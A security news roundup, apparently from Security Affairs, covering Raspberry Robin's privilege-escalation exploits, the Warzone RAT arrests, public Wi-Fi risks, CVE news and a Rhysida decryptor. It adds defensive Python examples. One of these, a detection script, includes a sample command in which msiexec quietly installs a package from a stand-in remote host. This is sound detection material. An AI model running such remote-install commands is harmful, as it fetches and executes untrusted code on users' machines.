Security Affairs

Raspberry Robin spotted using two new 1-day LPE exploits

11 February 2024 at 19:37

Raspberry Robin continues to evolve: it was spotted using two new one-day LPE exploits for recently disclosed vulnerabilities, and it has been seen using Discord to host samples.

Raspberry Robin is a Windows worm first documented by researchers at Red Canary; the malware propagates through removable USB devices.

The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The malware uses TOR exit nodes as a backup C2 infrastructure.

The malware was first spotted in September 2021, when the experts observed it targeting organizations in the technology and manufacturing industries. Initial access is typically through infected removable drives, usually USB devices.


The malware uses cmd.exe to read and execute a file stored on the infected external drive, then leverages msiexec.exe for outbound network communication to a rogue domain used as C2, from which it downloads and installs a malicious DLL.
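One way to turn the execution chain just described into a detection, as an added example that is not part of the original article or of any vendor rule set: it scans process-creation events (fields modelled on Sysmon Event ID 1) for cmd.exe launching content from a removable drive and for msiexec.exe installing a package straight from a URL. The event records, drive letters, hostnames and paths below are constructed, and the set of removable drive letters is assumed to come from EDR enrichment, since Sysmon itself does not record drive type.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 (process creation) record."""
    image: str          # full path of the new process
    command_line: str
    parent_image: str


URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
DRIVE_PATH_RE = re.compile(r"\b([A-Za-z]):\\")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events, removable_drives):
    """Return (rule, command_line) pairs for events matching either pattern.

    removable_drives: drive letters reported as removable media at the
    time, e.g. {"E:"} (assumed to come from EDR/drive-type enrichment).
    """
    removable = {d.rstrip(":").upper() for d in removable_drives}
    hits = []
    for ev in events:
        name = _basename(ev.image)
        cmd = ev.command_line
        if name == "msiexec.exe" and URL_RE.search(cmd):
            # msiexec fetching the package itself over HTTP(S); the quiet
            # switch means the user sees no installer UI at all.
            quiet = re.search(r"\s[/-]q", cmd, re.IGNORECASE) is not None
            rule = "msiexec remote package install" + (" (quiet)" if quiet else "")
            hits.append((rule, cmd))
        elif name == "cmd.exe":
            drives = {m.upper() for m in DRIVE_PATH_RE.findall(cmd)}
            if drives & removable:
                hits.append(("cmd.exe executing content from removable drive", cmd))
    return hits


# Constructed sample telemetry: two Raspberry Robin-style events, two benign ones.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /R E:\RECOVERY\usb_drive.cmd",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r"msiexec.exe /q /i http://q9w.example.invalid:8080/abc123",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r"msiexec.exe /qn /i C:\Users\alice\Downloads\7z2301-x64.msi",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c type C:\Users\alice\notes.txt",
                 r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS, {"E:"}):
        print(f"[{rule}] {cmd}")
```

msiexec installing from a URL is also how some enterprise deployment tools work, so the msiexec rule is a triage signal rather than a verdict: the domain's reputation, the parent process (cmd.exe spawned from a removable drive is the telling combination here) and the quiet switch decide whether it is worth an alert.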

Check Point researchers have now detailed the evolution of the threat: Raspberry Robin’s authors integrated two new 1-day LPE (local privilege escalation) exploits. The experts believe that either the operators have access to an exploit seller or the malware authors developed the exploits themselves.

The researchers noticed that Raspberry Robin is continually updated with new features and supports new evasion capabilities.

The malicious code also changed its communication method and lateral movement to avoid detection.

Raspberry Robin is now spreading by disguising itself as a legitimate Windows component.

“Since last October, we have seen large waves of attacks against our customers worldwide. Since our last report, it is clear that Raspberry Robin hasn’t stopped implementing new features and tricks that make it even harder to analyze.” reads the report published by Checkpoint. “Most importantly, Raspberry Robin continues to use different exploits for vulnerabilities either before or only a short time after they were publicly disclosed. Those 1-day exploits were not publicly disclosed at the time of their use. An exploit for one of the vulnerabilities, CVE-2023-36802, was also used in the wild as a 0-day and was sold on the Dark Web.”

The vulnerability CVE-2023-36802 is a Type Confusion issue in Microsoft Streaming Service Proxy. A local attacker can exploit the flaw to escalate privileges to SYSTEM (Local Privilege Escalation). The vulnerability is triggered when one of the following IOCTLs.

The vulnerability was disclosed on September 12, 2023, but researchers reported it had been exploited in the wild as a zero-day for some time before that. Researchers from cybersecurity firm Cyfirma reported that an exploit for CVE-2023-36802 was available for sale on Dark Web forums in February 2023, while Microsoft and CISA warned about its exploitation in September.

Raspberry Robin started using an exploit for CVE-2023-36802 in October 2023. Valentina Palmiotti also published details of CVE-2023-36802 and its exploitation in 2023.

The analysis of the samples from before October revealed that the operators also used an exploit for CVE-2023-29360. The exploit for CVE-2023-29360 was publicly disclosed in June 2023, and Raspberry Robin employed it in August.

“Even though this is a pretty easy vulnerability to exploit, the fact that the exploit writer had a working sample before there was a known exploit in GitHub is impressive as is how quickly Raspberry Robin used it.” continues the report.

The researchers conclude that Raspberry Robin operators have purchased the 1-day exploits from an exploit developer for the following reasons:

  • “The exploits are used as an external 64-bit executable. If the Raspberry Robin authors were the developers of the exploits, then they would have probably used the exploits in the main component itself. In addition, the exploits would be packed in the same way and have the same format as the different stages of the main component.
  • The exploits are only available for 64-bit.
  • The exploits are not heavily obfuscated and don’t have Control flow flattening and variable masking as in Raspberry Robin’s main component.”

The report includes Indicators of Compromise (IoCs) for this threat.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, malware)

US Feds arrested two men involved in the Warzone RAT operation

12 February 2024 at 08:24

The U.S. Justice Department (DoJ) seized the internet domains that were used to sell the Warzone remote access trojan (RAT).

The Justice Department announced the seizure of internet domains used to sell the remote access Trojan Warzone RAT (www.warzone[.]ws).

The seizure is the result of an international law enforcement operation; federal authorities in Atlanta and Boston charged individuals in Malta and Nigeria for their involvement in selling the malware.

According to court documents, the FBI covertly purchased and analyzed the Warzone RAT.

“Federal authorities in Boston seized www.warzone.ws and three related domains, which together offered for sale the Warzone RAT malware — a sophisticated remote access trojan (RAT) capable of enabling cybercriminals to surreptitiously connect to victims’ computers for malicious purposes.” reads the press release published by DoJ. “According to court documents authorizing the seizures, the Warzone RAT provided cybercriminals the ability to browse victim file systems, take screenshots, record keystrokes, steal victim usernames and passwords, and watch victims through their web cameras, all without the victims’ knowledge or permission.”

Investigations conducted by the US authorities led to two indictments against two men, Daniel Meli (27) and Prince Onyeoziri Odinakachi (31).

The two individuals are charged with selling and supporting the Warzone RAT and other malware.

Meli allegedly provided cybercriminals with malware products and services via online hacking forums. He is suspected of aiding cybercriminals in deploying Remote Access Trojans (RATs) for malicious purposes and selling instructional tools, including an eBook. Meli sold the Warzone RAT and, previously, the Pegasus RAT, distributed through the criminal organization Skynet-Corporation. Furthermore, he allegedly offered customer support to buyers of both RATs.

The second man, Prince Onyeoziri Odinakachi, from Nigeria, was indicted by a federal grand jury in the District of Massachusetts on January 30. He is accused of conspiracy to commit various cybercrimes, such as gaining unauthorized access to protected computers and causing unauthorized damage to protected computers. Between June 2019 and March 2023, Odinakachi provided online customer support to individuals who purchased and utilized the Warzone RAT malware.

The two individuals were arrested on February 7, 2024.

“The charges of conspiracy, obtaining authorized access to protected computers to obtain information, illegally selling an interception device, and illegally advertising an interception device each provide for a sentence of up to five years in prison, three years of supervised release and a fine of $250,000, or twice the gross gain or loss, whichever is greater.” concludes DoJ. “The charge of causing unauthorized damage to protected computers provides for a sentence of up to 10 years in prison, three years of supervised release, and a fine of $250,000, or twice the gross gain or loss, whichever is greater.”

Pierluigi Paganini

(SecurityAffairs – Hacking, malware)

9 Possible Ways Hackers Can Use Public Wi-Fi to Steal Your Sensitive Data

12 February 2024 at 08:50

Exploring the Risks: Unveiling 9 Potential Techniques Hackers Employ to Exploit Public Wi-Fi and Compromise Your Sensitive Data

We’ve all used public Wi-Fi: it’s convenient, saves our data, and speeds up browsing. But while we enjoy its benefits, hackers do too. Here, we’ll explore how cybercriminals exploit public Wi-Fi to access your private data and possibly steal your identity. Plus, we’ll discuss ways to protect yourself when using public Wi-Fi, even when you have no other option.

1.   Man-in-the-Middle Attacks (MITM)

When a hacker intercepts communication between two parties, it’s called a Man-in-the-Middle (MITM) attack. Instead of data going directly between you and the server, the hacker sneaks in and can even show you their own version of a website, including fake messages.

Public Wi-Fi users are prime targets for MITM attacks because open hotspots carry traffic without link-layer encryption, so anything not protected by TLS is readable to whoever controls the network or is within radio range. Once they’re in, they can grab your emails, usernames, passwords, and more, and might even lock you out of your own accounts by resetting your passwords.

Look for “https” in the website’s URL: it means the connection to that site is encrypted and the site’s identity has been checked against a certificate. Do not enter any data if the browser warns about a site’s certificate or authenticity; from your side, that warning is exactly what an interception attempt looks like. Most browsers will alert you if a site isn’t secure.

2.   Fake Wi-Fi Connections

Also known as the “Evil Twin,” this type of attack tricks you into joining a fake Wi-Fi network set up by a hacker. They can then intercept all the data you send over that network, without you even realizing it.

Creating a fake Wi-Fi network is surprisingly easy for cybercriminals, and they often do it near genuine hotspots to lure in unsuspecting victims.

Be cautious if you see two Wi-Fi networks with similar names. If you’re unsure, ask the staff at the place where you’re connecting to Wi-Fi. Also, consider using a Virtual Private Network (VPN) to encrypt your data and make it unreadable to hackers.

3.   Packet Sniffing

This method allows hackers to capture data packets flying through unencrypted networks and analyze them at their leisure. Packet sniffing isn’t always illegal – IT departments use it to maintain security but it’s also a favorite tool for cybercriminals looking to steal passwords and other sensitive information.

Invest in a VPN to encrypt your data and ensure the websites you use are served over SSL/TLS (look for “https” in the URL).

4.   Sidejacking (Session Hijacking)

Sidejacking, or session hijacking, builds on packet sniffing: the attacker captures the session cookie or token your browser sends after login and replays it to take over your current session on a website, gaining access to your private accounts and information.

While they can’t directly read your password, they can act as you for as long as the session stays valid, change account settings, or gather enough information to steal your identity.

Use a VPN to encrypt your data and always log out of your accounts when you’re finished using them, especially on public Wi-Fi. Check your social media accounts for active sessions and log out of any you don’t recognize.

5.   Shoulder-Surfing

Sometimes, the simplest scams are the most effective. Shoulder-surfing involves someone watching over your shoulder as you type in passwords or other personal information.

Be aware of your surroundings and who might be watching you. If you’re unsure, avoid entering sensitive information or use a privacy screen to block prying eyes.

6.   DNS Spoofing

DNS (Domain Name System) is like the internet’s phone book, translating domain names into IP addresses. Hackers can manipulate DNS settings to redirect your internet traffic to malicious websites, even if you entered the correct web address.

Consider using a reputable DNS service or a VPN that offers DNS encryption to prevent your traffic from being redirected.

7.   Wi-Fi Phishing

Similar to email phishing scams, Wi-Fi phishing involves setting up fake Wi-Fi networks that mimic legitimate ones. When users connect to these networks, hackers can intercept their data or trick them into entering sensitive information.

Always verify the authenticity of Wi-Fi networks before connecting, especially in public places. Avoid connecting to networks with generic names like “Free Wi-Fi” and be cautious of any network that requires you to input personal information to connect.

8.   Rogue Access Points

Hackers can set up their own wireless access points in public spaces, posing as legitimate hotspots. Once connected, they can monitor and capture users’ data or launch attacks on their devices.

Use a VPN to encrypt your internet traffic and avoid connecting to unfamiliar Wi-Fi networks. If you’re unsure about a network’s legitimacy, ask an employee or look for signage indicating the official Wi-Fi network.
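Sections 2, 7 and 8 all come down to the same question: is the network in front of me the one it claims to be? The following is an added example, not part of the original article, that triages a Wi-Fi scan for the patterns those sections describe: a trusted SSID advertised with weaker security or from hardware it was never seen on before, look-alike names, and open networks with generic names. The scan records, SSIDs, BSSIDs and the trust profile are constructed; on a real host you would build the records from `nmcli -t -f SSID,BSSID,SECURITY,SIGNAL dev wifi` or `netsh wlan show networks mode=bssid`.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessPoint:
    ssid: str
    bssid: str        # "aa:bb:cc:dd:ee:ff"
    security: str     # "OPEN", "WPA2", "WPA3", ...
    signal_dbm: int


# Names an attacker can use without impersonating anyone in particular.
GENERIC_NAMES = {"freewifi", "wifi", "publicwifi", "public", "guest", "hotspot"}


def _norm(ssid: str) -> str:
    """Collapse case, spaces and punctuation so 'Cafe Guest' == 'CafeGuest'."""
    return re.sub(r"[^a-z0-9]", "", ssid.casefold())


def _oui(bssid: str) -> str:
    """First three octets of the BSSID (the hardware vendor prefix)."""
    return bssid.lower()[:8]


def triage(scan, known):
    """Flag access points worth a second look.

    known maps a trusted SSID to the security mode and BSSID vendor
    prefixes it was seen with before (an assumed trust profile).
    Returns [(bssid, ssid, [reasons]), ...] in scan order.
    """
    known_norm = {_norm(s): s for s in known}
    findings = []
    for ap in scan:
        reasons = []
        profile = known.get(ap.ssid)
        if profile is not None:
            if ap.security != profile["security"]:
                reasons.append(f"security mismatch: expected {profile['security']}, saw {ap.security}")
            if _oui(ap.bssid) not in profile["ouis"]:
                reasons.append(f"unexpected BSSID prefix {_oui(ap.bssid)}")
        else:
            twin = known_norm.get(_norm(ap.ssid))
            if twin is not None:
                reasons.append(f"look-alike of known SSID {twin!r}")
            elif ap.security == "OPEN" and _norm(ap.ssid) in GENERIC_NAMES:
                reasons.append("open network with generic name")
        if reasons:
            findings.append((ap.bssid, ap.ssid, reasons))
    return findings


# Constructed trust profile and scan results (all SSIDs/BSSIDs are made up).
KNOWN = {"CafeGuest": {"security": "WPA2", "ouis": {"a4:2b:8c"}}}
SCAN = [
    AccessPoint("CafeGuest", "a4:2b:8c:11:22:33", "WPA2", -48),   # the real one
    AccessPoint("CafeGuest", "de:ad:be:ef:00:01", "OPEN", -35),   # evil twin: open, unknown hardware
    AccessPoint("Cafe Guest", "de:ad:be:ef:00:02", "WPA2", -40),  # look-alike name
    AccessPoint("Free Wi-Fi", "00:11:22:33:44:55", "OPEN", -60),  # generic open hotspot
    AccessPoint("AcmeCorp", "f0:9f:c2:01:02:03", "WPA3", -70),    # unknown but unremarkable
]

if __name__ == "__main__":
    for bssid, ssid, reasons in triage(SCAN, KNOWN):
        print(f"{ssid!r} ({bssid}): " + "; ".join(reasons))
```

A BSSID is trivially spoofable, so treat these as hints for the "ask the staff" step rather than as proof either way; an access point that is suddenly much stronger than the one you normally see from the same spot is another classic evil-twin tell, and an open network that matches a name you know as WPA2 should never be joined.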

9.   Keyloggers

Keyloggers are malicious software or hardware devices that record keystrokes on a computer or mobile device. If a hacker manages to install a keylogger on a public computer or compromised device, they can capture usernames, passwords, and other sensitive information entered by users.

Avoid using public computers for sensitive activities like online banking or entering passwords. A virtual (on-screen) keyboard defeats a hardware keylogger, but a software keylogger on the same machine can also capture the clipboard and take screenshots, so typing into a document and copy-pasting buys little; treat anything entered on a public computer as exposed and change those credentials from a trusted device afterwards.

Wrapping Up

In conclusion, while public Wi-Fi offers convenience and connectivity, it also presents numerous security risks. Hackers employ tactics such as man-in-the-middle attacks, fake Wi-Fi connections, and packet sniffing to steal sensitive data from unsuspecting users. A VPN adds a layer of protection in exactly these situations: it encrypts everything between your device and the VPN server, so the hotspot operator or anyone else on the local network sees only an encrypted tunnel to a single endpoint, and the sites you visit see the VPN server’s IP address rather than your own.

By implementing measures like using a VPN, verifying a Wi-Fi network’s authenticity before connecting, and staying alert to the common threats above, individuals can safeguard their personal information and minimize the risks of using public Wi-Fi. It’s crucial to remain vigilant and take proactive steps to protect oneself in an increasingly interconnected digital world.

About Author: Anas Baig

With a passion for working on disruptive products, Anas Baig is currently working as a Product Manager at the Silicon Valley based company Securiti.ai. He holds a degree in Computer Science from Iqra University and specializes in Information Security & Data Privacy.

Pierluigi Paganini

(SecurityAffairs – hacking, Public Wi-Fi)

ExpressVPN leaked DNS requests due to a bug in the split tunneling feature

12 February 2024 at 11:04

A bug in the split tunneling feature implemented in ExpressVPN exposed the domains visited by the users.

ExpressVPN addressed a bug in the split tunneling feature that exposed the domains visited by the users to configured DNS servers.

The company opted to temporarily remove the feature from the Windows app to address the issue. Split tunneling will be re-enabled in a future release once the bug is fixed.

The issue affected ExpressVPN Windows versions 12.23.1 through 12.72.0, released from May 19, 2022 onward, and was addressed in the subsequent Version 12 release for Windows, which removed the feature.

The issue was discovered by Attila Tomaschek, a VPN expert and staff writer at the tech publication CNET. Tomaschek noticed that DNS requests on his Windows machine weren’t being directed to ExpressVPN’s dedicated servers when he had activated the split tunneling feature, which is used to limit which apps send their traffic through the VPN. The expert noticed that the DNS queries were sent to the DNS server configured on the computer.

“When a user is connected to ExpressVPN, their DNS requests are supposed to be sent to an ExpressVPN server. But the bug allowed some of those requests to go instead to a third-party server, which in most cases would be the user’s internet service provider or ISP.” reads the advisory. “This lets the ISP see what domains are being visited by that user, such as google.com, although the ISP still can’t see any individual webpages, searches, or other online behavior. All contents of the user’s online traffic remain encrypted and unviewable by the ISP or any other third party.”

The advisory published by the company states that the issue is believed to impact less than 1% of users on a single app platform, Version 12 for Windows. The company also announced an investigation into the bug.

“We were only able to replicate the issue when using the specific split tunneling mode “Only allow selected apps to use the VPN,” and even then, we found that it only occurred in some cases. In our testing, users who had not activated split tunneling at all, or who had chosen the other mode, “Do not allow selected apps to use the VPN,” had their DNS requests handled properly. No other VPN protections, such as encryption, were affected.” reads the advisory

Users still on an affected version can prevent the DNS leak by disabling the split tunneling feature.

Pierluigi Paganini

(SecurityAffairs – Hacking, ExpressVPN)

Canada Gov plans to ban the Flipper Zero to curb car thefts

12 February 2024 at 14:09

The Canadian government is going to ban the tool Flipper Zero because it is abused by crooks to steal vehicles in the country.

The Canadian government announced that it plans to ban the tool Flipper Zero, and similar hacking devices, to curb the surge in car thefts.

Flipper Zero is “a portable multi-tool for pentesters and geeks in a toy-like body. It allows hacking digital stuff, such as radio protocols, access control systems, hardware, and more,” reads the official website, which adds that the tool “is fully open-source and customizable, so you can extend it in whatever way you like.”

Car thieves could use the tool to capture and replay radio signals from key fobs to unlock vehicles; note, however, that most modern remote keyless entry systems use rolling codes, which a simple capture-and-replay does not defeat on its own.

“Auto theft is a problem the government can’t tackle alone.” said Canadian Industry Minister François-Philippe Champagne. “Criminals have been using sophisticated tools to steal cars. And Canadians are rightfully worried.   Today, I announced we are banning the importation, sale and use of consumer hacking devices, like flippers, used to commit these crimes.”

— François-Philippe Champagne (@FP_Champagne) on X, February 8, 2024: https://t.co/K4MA3u68kP

Canadian authorities estimate that about 90,000 vehicles are stolen each year, equating to one car stolen every six minutes. Beyond the social implications, auto theft imposes a significant economic burden on Canadian car owners, resulting in approximately $1 billion in annual losses, including an estimated $542 million a year that insurers spend to repair or replace stolen vehicles.

“As a participant in the National Summit on Combatting Auto Theft, we recognize the need to coordinate and enhance efforts to combat auto theft in Canada, with a particular focus on regions that are being disproportionately impacted.” reads the Statement of Intent on Combatting Auto Theft published by the Canadian Government. “We recognize that combatting auto theft is complex, consisting of many points of possible deterrence and intervention including prevention, detection, enforcement and recovery.”

Innovation, Science and Economic Development Canada will work with Canadian companies, and the automotive industry, to develop new solutions to protect vehicles against theft and to assist with recovery of stolen vehicles.

The Canadian government’s Innovation, Science and Economic Development (ISED) is focused on banning any tool that can be abused to steal cars.

“ISED will pursue all avenues to ban devices used to steal vehicles by copying the wireless signals for remote keyless entry, such as the Flipper Zero, which would allow for the removal of those devices from the Canadian marketplace through collaboration with law enforcement agencies.” reads a statement from the Canadian Government.

Flipper Zero’s makers denied that their tool is used to steal vehicles.

“We’d appreciate it if you could provide any evidence of Flipper Zero being involved in any criminal activities of this kind. We’re not aware of any events like this and frankly speaking not sure what was the reason for this discussion to begin with.” reads a message published by the company on X.

— Flipper Zero (@flipper_zero) on X, February 9, 2024

Pierluigi Paganini

(SecurityAffairs – Hacking, Flipper Zero)

CISA adds Roundcube Webmail Persistent XSS bug to its Known Exploited Vulnerabilities catalog

12 February 2024 at 18:53

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Roundcube Webmail Persistent Cross-Site Scripting (XSS) Vulnerability to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Roundcube Webmail Persistent Cross-Site Scripting (XSS) vulnerability, tracked as CVE-2023-43770, to its Known Exploited Vulnerabilities (KEV) catalog.

Roundcube is an open-source web-based email client. It provides a user-friendly interface for accessing email accounts via a web browser. Users can send and receive emails, manage their contacts, organize messages into folders, and perform various other email-related tasks. Roundcube supports standard email protocols such as IMAP and SMTP, making it compatible with a wide range of email servers.

Exploitation of the vulnerability, a persistent XSS via crafted link references in text/plain messages, can lead to information disclosure.

The vulnerability was discovered by Niraj Shivtarka; it impacts Roundcube before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3, and was fixed with the releases of versions 1.4.14, 1.5.4 and 1.6.3.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this vulnerability by March 4, 2024.

In October, Russia-linked APT group Winter Vivern (aka TA473) was observed exploiting another zero-day flaw in Roundcube webmail software.

ESET researchers pointed out that it is a different vulnerability from CVE-2020-35730, which the group exploited in other attacks.

ESET reported the zero-day to Roundcube, and the company patched the issue on October 14th, 2023. The vulnerability affects Roundcube versions 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15.
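With two Roundcube issues and three maintained branches in play, the fix version depends on which branch a host runs. The following is an added example, not from the article, CISA or the Roundcube project, that evaluates an installed version against the affected ranges stated above for CVE-2023-43770 and for the October 2023 zero-day. It assumes the version can be read from the RCMAIL_VERSION define in program/include/iniset.php (verify the location on your install); the PHP fragment below is constructed.

```python
import re

# First fixed release per branch, as listed above (branch -> fixed version).
FIXED_VERSIONS = {
    "CVE-2023-43770": {(1, 4): (1, 4, 14), (1, 5): (1, 5, 4), (1, 6): (1, 6, 3)},
    "Roundcube October 2023 zero-day (ESET)": {(1, 4): (1, 4, 15), (1, 5): (1, 5, 5), (1, 6): (1, 6, 4)},
}

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str):
    """'1.6.3' or '1.6.3-git' -> (1, 6, 3); raises on anything else."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Roundcube version: {text!r}")
    return tuple(int(x) for x in m.groups())


def version_from_iniset(php_source: str) -> str:
    """Pull the version out of program/include/iniset.php, which defines
    RCMAIL_VERSION (assumed location; check your install)."""
    m = re.search(r"define\(\s*'RCMAIL_VERSION'\s*,\s*'([^']+)'\s*\)", php_source)
    if not m:
        raise ValueError("RCMAIL_VERSION not found")
    return m.group(1)


def affected_by(version: str):
    """Names of the issues above that the given version is still exposed to."""
    v = parse_version(version)
    branch = v[:2]
    exposed = []
    for name, fixes in FIXED_VERSIONS.items():
        if branch in fixes:
            vulnerable = v < fixes[branch]
        elif branch < min(fixes):
            vulnerable = True        # older than any branch that received a fix
        else:
            vulnerable = False       # a newer branch than the advisory covers
        if vulnerable:
            exposed.append(name)
    return exposed


# Constructed iniset.php fragment standing in for a real install.
SAMPLE_INISET = """<?php
// Roundcube Webmail bootstrap (constructed sample)
define('RCMAIL_VERSION', '1.6.2');
define('RCMAIL_START', microtime(true));
"""

if __name__ == "__main__":
    ver = version_from_iniset(SAMPLE_INISET)
    print(ver, "->", affected_by(ver) or "not affected")
```

Run it across a fleet and the interesting cases are the ones the naive "is it at least 1.6.3?" check gets wrong: 1.5.4 is patched for CVE-2023-43770 despite being numerically below 1.6.3, and 1.6.3 itself, the version that closed CVE-2023-43770, is still exposed to the zero-day fixed in 1.6.4.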

Pierluigi Paganini

(SecurityAffairs – Hacking, Known Exploited Vulnerabilities catalog)

Researchers released a free decryption tool for the Rhysida Ransomware

12 February 2024 at 22:43

Researchers discovered a vulnerability in the code of the Rhysida ransomware that allowed them to develop a decryption tool.

Cybersecurity researchers from Kookmin University and the Korea Internet and Security Agency (KISA) discovered an implementation vulnerability in the source code of the Rhysida ransomware.

The experts exploited the vulnerability to reconstruct encryption keys and developed a decryptor that allows victims of the Rhysida ransomware to recover their encrypted data for free.

“This study examines Rhysida ransomware, which caused significant damage in the second half of 2023, and proposes a decryption method. Rhysida ransomware employed a secure random number generator to generate the encryption key and subsequently encrypt the data. However, an implementation vulnerability existed that enabled us to regenerate the internal state of the random number generator at the time of infection.” reads the paper published by the researchers “We successfully decrypted the data using the regenerated random number generator. To the best of our knowledge, this is the first successful decryption of Rhysida ransomware.”

The implementation vulnerability resides in the encryption scheme implemented by the ransomware, specifically in how the cryptographically secure pseudorandom number generator (CSPRNG) is seeded.

The CSPRNG is used to generate the encryption key, which is unique for each attack.

“The random number generator takes a seed as input, sets it as the initial internal state, and generates a sequence of random numbers according to a defined rule. Therefore, if we can identify the initial internal state, regenerating the random number becomes feasible.” reads the paper.

By exploiting the flaw, the researchers demonstrated that it is possible to recover the internal state of the CSPRNG and use it to regenerate the key needed to decrypt the data.

The Rhysida ransomware uses a CSPRNG based on the ChaCha20 algorithm, as provided by the LibTomCrypt library.

The researchers noticed that the CSPRNG is seeded from the execution time of the ransomware. The time value used as a seed is 32-bit data, which implies that the number of possible seeds, and thus of generator states to try, is at most 2^32.

The experts also discovered that the ransomware manages a list of files that it is going to encrypt. The ransomware uses various concurrent threads that encrypt the files in a specific order.

“In the encryption process of the Rhysida ransomware, the encryption thread generates 80 bytes of random numbers when encrypting a single file. Of these, the first 48 bytes are used as the encryption key and the Initial Vector.” continues the paper.

Based on these observations, the researchers successfully obtained the initial seed for decrypting the ransomware, identified the order used to encrypt the files, and ultimately restored the data without paying any ransom.
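The three observations above (a 32-bit time seed, 80 random bytes drawn per file with the first 48 used as key and IV, and a recoverable file order) are enough to model the attack end to end. The following is an added example and is neither the researchers' decryptor nor Rhysida's code: the ChaCha20 generator and the real file cipher are replaced by SHA-256-based stand-ins so it runs on the standard library alone, the sample files and the "execution time" seed are constructed, and files are assumed to have been encrypted in a known sequential order. What it shows is the actual lever: a 2^32 seed space shrinks to a few thousand candidates once you know roughly when the ransomware ran, and a file signature is enough to pick the right one.

```python
import hashlib
import struct

BYTES_PER_FILE = 80         # random bytes the encryption thread draws per file (from the paper)
KEY_LEN, IV_LEN = 32, 16    # the first 48 of them are key + IV


class ToyPrng:
    """Deterministic stream from a 32-bit seed: block i = SHA-256(seed || i).
    Stand-in for the time-seeded ChaCha20 generator; the property that
    matters is that the seed fully determines every byte it will emit."""

    def __init__(self, seed32: int):
        self.seed = seed32 & 0xFFFFFFFF
        self.buf = b""
        self.ctr = 0

    def next_bytes(self, n: int) -> bytes:
        while len(self.buf) < n:
            self.buf += hashlib.sha256(struct.pack("<II", self.seed, self.ctr)).digest()
            self.ctr += 1
        out, self.buf = self.buf[:n], self.buf[n:]
        return out


def keystream_xor(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Toy stream cipher (counter-mode keystream from SHA-256) standing in
    for the real file cipher; XOR makes encryption and decryption identical."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + iv + struct.pack("<Q", i // 32)).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def file_key_iv(seed32: int, file_index: int):
    """Key/IV of the file_index-th file of one run: the run's generator
    advanced by 80 bytes for every file encrypted before it (assumes the
    files were processed in a known, sequential order)."""
    rnd = ToyPrng(seed32).next_bytes(BYTES_PER_FILE * (file_index + 1))[-BYTES_PER_FILE:]
    return rnd[:KEY_LEN], rnd[KEY_LEN:KEY_LEN + IV_LEN]


def encrypt_run(seed32: int, plaintexts):
    return [keystream_xor(*file_key_iv(seed32, i), p) for i, p in enumerate(plaintexts)]


def decrypt_run(seed32: int, ciphertexts):
    return [keystream_xor(*file_key_iv(seed32, i), c) for i, c in enumerate(ciphertexts)]


def recover_seed(ciphertext: bytes, known_prefix: bytes, file_index: int, t_lo: int, t_hi: int):
    """Brute-force the seed over the candidate time window [t_lo, t_hi]: the
    right seed regenerates a key/IV that turns the ciphertext head back into
    the known plaintext prefix (a file signature). None if no seed fits."""
    head = ciphertext[:len(known_prefix)]
    for seed in range(t_lo, t_hi + 1):
        key, iv = file_key_iv(seed, file_index)
        if keystream_xor(key, iv, head) == known_prefix:
            return seed
    return None


# Constructed victim data: three files encrypted in one run whose seed was
# the (made-up) execution time 1700000000.
INFECTION_TIME = 1_700_000_000
FILES = [
    b"PK\x03\x04 constructed zip body, not a real archive",
    b"%PDF-1.7\n% constructed pdf body, not a real document",
    b"\x89PNG\r\n\x1a\n constructed png body, not a real image",
]


def demo():
    """Defender's view: the ciphertexts, the knowledge that file 1 was a PDF,
    and a rough infection window from file timestamps (assumed, about 2 h wide)."""
    cts = encrypt_run(INFECTION_TIME, FILES)
    seed = recover_seed(cts[1], b"%PDF-", file_index=1,
                        t_lo=INFECTION_TIME - 3000, t_hi=INFECTION_TIME + 4200)
    return seed, (decrypt_run(seed, cts) if seed is not None else None)


if __name__ == "__main__":
    seed, files = demo()
    print("recovered seed:", seed, "files restored:", files == FILES)
```

Two caveats carry over to the real case. A five-byte signature gives each wrong seed a 2^-40 chance of matching, which is negligible over a window of hours but adds up to a fraction of a percent over the full 2^32 range, so confirm a hit against a second file or a longer known prefix. And the per-file key depends on how many bytes the generator had already handed out, which is why the paper had to reconstruct the order in which the concurrent encryption threads consumed it; the sequential order assumed here is the simplest case of that problem.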

“By exploiting these vulnerabilities, we managed to reconstruct the encryption key and recover the encrypted system. This challenges the common belief that ransomware makes data irretrievable without fulfilling the ransom demand. While these findings are based on a limited scope, it is crucial to recognize that certain ransomwares, as demonstrated in this paper, can indeed be successfully decrypted.” concludes the paper.

The Rhysida ransomware group has been active since May 2023. According to the gang’s Tor leak site, at least 62 companies are victims of the operation.

